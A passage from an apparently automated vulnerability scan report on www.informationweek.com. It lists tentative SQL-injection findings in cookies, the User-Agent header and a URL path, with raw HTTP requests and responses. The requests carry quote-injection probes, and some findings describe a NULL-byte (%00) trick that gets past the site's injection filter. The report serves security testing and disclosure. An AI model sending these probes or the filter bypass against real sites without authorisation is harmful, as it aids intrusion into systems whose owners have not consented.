<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M
...[SNIP]...
</a> against Google in the U.S. for alleged illegal data interception.<br />
...[SNIP]...

Request 2

GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.6. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [iwkbtn_101201 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/david_berlinds_tech_radar/index.html

Issue detail

The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M
...[SNIP]...
</a> against Google in the U.S. for alleged illegal data interception.<br />
...[SNIP]...

Request 2

GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:58 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.7. http://www.informationweek.com/blog/main/archives/mobile/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/mobile/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:34 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:34 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO
...[SNIP]...
<h1>Motorola Seeks To Invalidate Apple Patents</h1>
...[SNIP]...

Request 2

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.8. http://www.informationweek.com/blog/main/archives/mobile/index.html [s_lv_s cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/mobile/index.html

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days';

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO
...[SNIP]...
<h1>Motorola Seeks To Invalidate Apple Patents</h1>
...[SNIP]...

Request 2

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days'';

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.9. http://www.informationweek.com/blog/main/archives/mobile/index.html [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/mobile/index.html

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO
...[SNIP]...
<h1>Motorola Seeks To Invalidate Apple Patents</h1>
...[SNIP]...

Request 2

GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.10. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/wolfes_den/index.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/main/archives/wolfes_den'/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 58155

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you reque
...[SNIP]...

Request 2

GET /blog/main/archives/wolfes_den''/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den''/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.11. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [ebNewBandWidth_.www.informationweek.com cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/wolfes_den/index.html

Issue detail

The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333'; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot
...[SNIP]...
<p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War
...[SNIP]...

Request 2

GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333''; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.12. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [s_lv_s cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/wolfes_den/index.html

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00';

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152


<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot
...[SNIP]...
<p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War
...[SNIP]...

Request 2

GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00'';

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.13. http://www.informationweek.com/events/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /events/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t
...[SNIP]...
</strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong>
...[SNIP]...

Request 2

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.14. http://www.informationweek.com/events/ [iwkbtn_101201 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /events/

Issue detail

The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
